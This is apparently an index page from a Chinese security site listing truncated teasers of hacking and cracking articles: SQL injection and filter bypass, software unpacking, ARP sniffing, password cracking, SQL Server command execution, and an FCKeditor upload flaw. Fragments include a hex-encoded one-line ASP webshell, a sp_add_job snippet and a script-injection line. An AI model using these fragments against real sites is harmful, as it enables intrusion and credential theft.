sqlserver注入:SQL Server安全-加密术和SQL注入攻击
来源:安全中国SQL Server上加密术 SQL Server上内置了加密术用来保护各种类型敏感498)this.style.width=498;" 加密也不能完全自由当连接确定后要继续其他构造并且用户和服务器必须运行代码来解释加密和解释包裹这里将需要些开销并且当在编译码时候会使进程慢下来如果网络包裹在你控制范围的外使用这种做法是非常好加密术中缺少什么?你可以注意到在这个列表中缺少些被加密东西:... [阅读全文]
脱壳软件:脱壳后软件Software减肥大法
来源:安全中国最近练习脱壳将用98记事本用Armadillo 3.10加壳作试验52K -- 324K脱壳后文件大小达到了588K比脱壳前竟然大了10倍多于是想将的减肥查看雪精华没找到这方面内容正在学习PE文件结构于是自己动手试验下 先看看加壳前文件sections 建议装入地址: 0x00400000 ---------------------------------------... [阅读全文]
批处理工具:批处理打造自己的工具
来源:安全中国很久没给大家带来好东西了作为批处理区版主有点失职先给大家陪个不是了这篇文章是我在黑手上看到其中最出色地方就是结合了INF文件这个对我来说是个新概念! 这个批处理工具有5个功能 1.查询快捷方式所指文件路径 2.系统账号重命名功能 3.重新启动 4.安装和卸载系统服务功能 5.查看端口关联进程功能 在这里功能利用是findstr正则表达式在批处理例子教学动画... [阅读全文]
字典生成器:用vbs写的短小精悍的字典生成器
'code by lcx ,很好,很强大,很黄很暴力,很傻很天真,很zd很cnn'这个是算区别数字和字母所有排列组合,当然可以做为字典生成器来用.如需区别组合,只需改本a和b变量即可以.'use:cscript this.vbs dic.txt a=Array(1,2,3,4,"a")Function js1(n)for i=1 to nf=f&"f"&i&"&"s=s&"For Each f"... [阅读全文]
攻击木马--远程控制软件Software自身的漏洞你注意了吗
来源:安全中国前两天RSA conference上有个叫Joel Eriksson研究人员展示如何通过攻击木马(尤其是木马控制端)来控制“黑客”blog.wired.com/27bstroke6/2008/04/researcher-demo.htmlEriksson找到了个在天朝比较流行PCshare漏洞可以上传文件到控制端自启动目录:)这是他展示Pcshare图片这张貌似和他说漏洞也没什么关系... [阅读全文]
sinffer:ARP Sinffer用户攻防例子详解
来源:安全中国ARP攻击是近几年黑客界才兴起来个在局域网络内部实施攻击手段通常利用安装arp-snfer工具捕捉如帐户密码ftp用户名用户密码这样有价值信息这种攻击手段属于网络渗透攻击范畴子明分别以攻击和解决两个例子来帮助大家了解ARP欺骗攻击本质 大家都知道真正网络攻击80%-90%都发生自内网中也就俗称内网攻击般黑客惯用手法般不亚于以下几个步骤:踩点、扫描、查点、攻击、系统提权、内... [阅读全文]
怎么恢复系统管理员:新思路用Gene恢复系统管理员密码
来源:IT168 作者:beijing 松儿你是否知道如何操作系统管理员帐号密码呢?对于大多数关注网络安全和网络技术读者来说答案是肯定然而我们平时恢复系统密码不外乎删除SAM文件通过WinPE强制修改密码又或者利用组策略启动脚本和些DLL文件覆盖方式达到破解目然而你是否知道通过FTP登录可以远程实现系统管理员密码修改和恢复工作吗?今天就请各位跟随笔者大开眼界选择新思路用Gene ftp恢复系统管理... [阅读全文]
经典一句话Asp木马加密(去掉asp里的%)
来源:安全中国不知道怎样表达清楚看例子吧: script language=vbs runat=server Execute(HextoStr("65786563757465287265717565737428636872283335292929")) Function HextoStr(data) HextoStr="EXECUTE """"" C="&CHR(&H" N=")... [阅读全文]
fckeditor上传路径:巧用遨游找出fckeditor上传木马路径
最近有朋友问我利用Fckeditor上传漏洞并结合2003服务器解析漏洞拿网站WebSitewebshell时候总是找不到上传后文件路径如何办呢?相信这个问题应该是很多朋友遇到过首先我们来看看Fckeditor漏洞: http://www.xxx.com/fckeditor/editor/filemanager/browser/default/browser.html?typeall&conn... [阅读全文]
ettercap:Ettercap-交换环境下的嗅探器使用思路方法
来源:安全中国:安装 你可以在网上很多地方下载到它最新版本,比如http://ettercap.sourceforge.net 下载完后,先解压缩: [root@CIEL root]#tar zxpvf ettercap-0.6.tar.gz [root@CIEL root]#cd ettercap-0.6 [root@CIEL ettercap-0.6]#./configure&&make... [阅读全文]
脚本注入:突破SQL脚本注入限制的一点想法
来源:安全中国突然想我们是否可以用什么思路方法绕过SQL注入限制呢?到网上考察了下提到思路方法大多都是针对AND和“’”号和“=”号过滤突破虽然有点进步地方但还是有些关键字没有绕过由于我不常入侵网站WebSite所以也不敢对上述过滤效果进行评论但是可以肯定是效果不会很好…… 经过我收集大部分防注入都过滤了以下关键字: and | select | update | chr | delete | %... [阅读全文]
acprotect:ACProtect 1.22b脱壳手记----NOTEPAD.EXE
来源:安全中国ACProtect 1.22b脱壳手记----NOTEPAD.EXE 目标:NOTEPAD.EXE自己用ACProtect 1.22b专业版加壳Compress Opetions里选Opetion1Advanced Opetions 6个选项全选;加壳前49.7 KB加壳后143 KB 工具:OllyDbg Beta110b原版; ImportREC 1.6 FINAL 破解平... [阅读全文]
acprotect:ACProtect 1.21专业版主程序的脱壳
来源:安全中国ACProtect 1.21专业版主脱壳 操作系统:WIN2K 工具:OLLYDBG1.1ImportRECLordPE 下载地址: http://www.ultraprotect.com/acpr_pro.exe 目标:ACProtect 1.21专业版主 脱壳过程: 1.寻找Stolen code变形及其伪OEP 用OLLYDBG1.1加载后停留在入口... [阅读全文]
脱壳修复:Acprotect1.09g标准版脱壳+伪修复
【脱文作者】 weiyi75[Dfcg] 【作者邮箱】 [email protected] 【作者主页】 Dfcg官方大本营 【使用工具】 Ollydbg1.10b抗Antidbg版,ImportREC1.42LoadPe,Winhex 【破解平台】 Win2000/XP 【软件Software名称】 Acprotect1.09g标准版 【下载地址】 ... [阅读全文]
dephi语言:Acprotect1.10 Build123的Dephi语言篇
=postbody【脱文作者】 weiyi75[Dfcg] 【作者邮箱】 [email protected] 【作者主页】 Dfcg官方大本营 【使用工具】 Ollydbg1.10b(反Antidbg版),ImportREC1.42 【破解平台】 Win2000/XP 【软件Software名称】 PE文件分析器 【下载地址】 附件下载 【软件Software介绍】 Acprotect1.10 ... [阅读全文]
菜鸟也玩手动修复引入表
来源:安全中国手工修复引入表是破解加壳软件Software最难道工序向是顶尖高手专利令我等菜鸟往往望而却步而不敢奢望越雷池半步!那么有没有简单些思路方法呢?通过本人实战终于找到了这条捷径我做法可以分为以下几步: 1、确定OEP并脱壳 2、使未脱壳处于正常运行态使用ImportREC或LordPE检查是否所有API都可识别并记录下不可识别API列表及其入口地址 3、重新... [阅读全文]
命令提示符被禁用:命令提示符被病毒禁用的解决办法
来源:安全中国近期接到部分用户反馈杀毒后命令提示符被系统管理员禁用系统cmd以及批处理脚本均无法运行如图所示:screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.alt='Click here to open window\nCTRL+Mouse wheel to zoom in/out';}" bord... [阅读全文]
推荐:网管员必知常识 常用电脑密码破解秘诀
来源:新浪科技网管员在维护和使用电脑时经常会遇到各种密码丢失问题在我们赛迪网技术社区中恰好有这样篇帖子:网管员必知:常用电脑密码破解专门为广大网管员准备了些破解密码思路方法但是希望大家不要干坏事哦开机密码是我们最先要遇到因此我们就先从CMOS密码破解讲起虽然CMOS种类各异但它们加密思路方法却基本致般破解思路方法主要从"硬"和"软"两个方面来进行 、CMOS破解 使用电脑首先需要开... [阅读全文]
vbs修改文件名:vbs搜索文件名或者得到目录列表
作者:lcx来源:vbs小铺'把网上个小改得方便了点这个搜索次效率很好on error resume nextDim keyWord, DirTotal, TimeSpend, FileTotal, Fso, outFile, txtResult, txtPath, sPathConst MY_COMPUTER = &H11&Const WINDOW_HANDLE = 0Const OPTIONS... [阅读全文]
新概念学习软件:学习软件Software破解最基本的6个概念
来源:安全中国1. 断点: 所谓断点就是被中断地方这个词对于解密者来说是再熟悉不过了那么什么又是中断呢?中断就是由于有特殊事件(中断事件)发生计算机暂停当前任务(即)转而去执行另外任务(中断服务)然后再返回原先任务继续执行打个比方:你正在上班突然有同学打电话告诉你他从外地坐火车过来要你去火车站接他然后你就向老板临时请假赶往火车站去接同学接着将他安顿好随后你又返回公司继续上班这就是个中断过程我们解... [阅读全文]
winrar:绝对不可错过WinRAR 3种安全战术
来源:安全中国、拒绝利用WinRAR捆绑恶意 不少木马、硬盘炸弹等恶意就是利用WinRAR自解压捆绑来伪装自己那如何区别正常自解压文件和捆绑了恶意自解压文件呢? 很简单!只要能发现自释放文件里面隐藏有多个文件特别是多个可执行文件就可以判定其中含有恶意那么怎样才能知道自释放文件中含有几个文件是哪些文件呢? 个简单识别思路方法是:用鼠标右击WinRAR自释放文件在弹出菜单中选择“属性... [阅读全文]
以毒攻毒: 浅析大型机房网络黑洞的妙用
来源:安全中国网络黑洞产生原理 对网络技术有所了解朋友都碰到过这种事情:在没有UPS不间断电源支撑情况下由于电源突然中断导致公司机房里包括路由器在内所有设备都停止运行 当电源恢复供应节点路由器重新启动内外网络互联在几分钟内却并未立刻完全恢复这期间通过网络传输数据很可能会由于无法正常传输和接收而丢失 这网络故障是如何产生呢? 在节点路由器重启后几分钟内该路由器会首先向它下节点发送可... [阅读全文]
执行外部系统命令:有关public权限执行系统命令
作者:伤心鱼[BCT]鬼仔's Blog( 500)this.width=500;"SQL Server Agent 这服务必须开启开启服务后进入查询分析器. 这里我是用新建public用户 首先 Select host_name 获取当前库服务器机器名然后在查询分析器执行下面代码 USE msdbEXEC sp_add_job @job_name = 'GetOnSQL',@enabled = ... [阅读全文]
gtlt:有关< < 2行代码解决全部网页木马> > 的文章
作者:lcx来源:vbs小铺原文在这:http://www.blueidea.com/tech/web/2008/5575.asp主要目是用css解决script标签里http这种思路方法治标不治本我觉得防掉很难根治办法就是主机安全不给别人黑掉机会突破思路方法有N种最简单突破办法不把src=http放在script标签里代码: scripteval(document.write("script s... [阅读全文]
漏洞源代码:一次简单的php源代码泄露漏洞发掘
来源:安全中国我们知道在asp中出现得最多还是sql注入不过在php中由于magic_quotes_gpc为on情况下特殊会被转义所以即使有很多时候存在sql注入也无法利用但是php强大文件操作功能却使我们能体会到在asp中无法体会乐趣我想php自带文件操作能让你为的心跳加快~~嘿嘿 这次我发掘是phpcms2007源代码泄露漏洞 再次向Phpcms2007开源行为致敬!! 开始吧 findstr... [阅读全文]
romote:利用Gmail插件Gmail Romote Command(GRC)远程控制电脑
来源:安全中国什么是Gmail Romote Command(GRC)?GRC是款Gmail插件功能:1、定时检测Gmail邮箱这里是1分钟次2、如果检测到特定邮件头邮件则可在本地计算机执行某条命令我们看看Gmail Romote Command(GRC)使用方法:输入你Gmail用户名和密码点Sign in登陆设置界面代码和HTML或者UBB有相似的处Subject Tag Left - 标签左... [阅读全文]
dos下刷bios:程序从DOS/bios驻留内存到WINNT下监视读入内存数据
作者:成松林 QQ:179641795 Email:[email protected] 注意:欢迎大家转载,请大家转载注明原出处和作者信息.发篇文章不容易..大家请保留作者信息. .586p ;######################################################################## .m... [阅读全文]
ms08025:Windows 内核漏洞 ms08025 分析
Windows 内核漏洞 ms08025 分析 Author: Polymorphours Email: [email protected] Homepage:http://www.whitecell.org Date: 2008-04-10 经内部讨论后决定公布分析成果 4月8号microsoft再次发布了个系统内核补丁(KB941693), 微... [阅读全文]
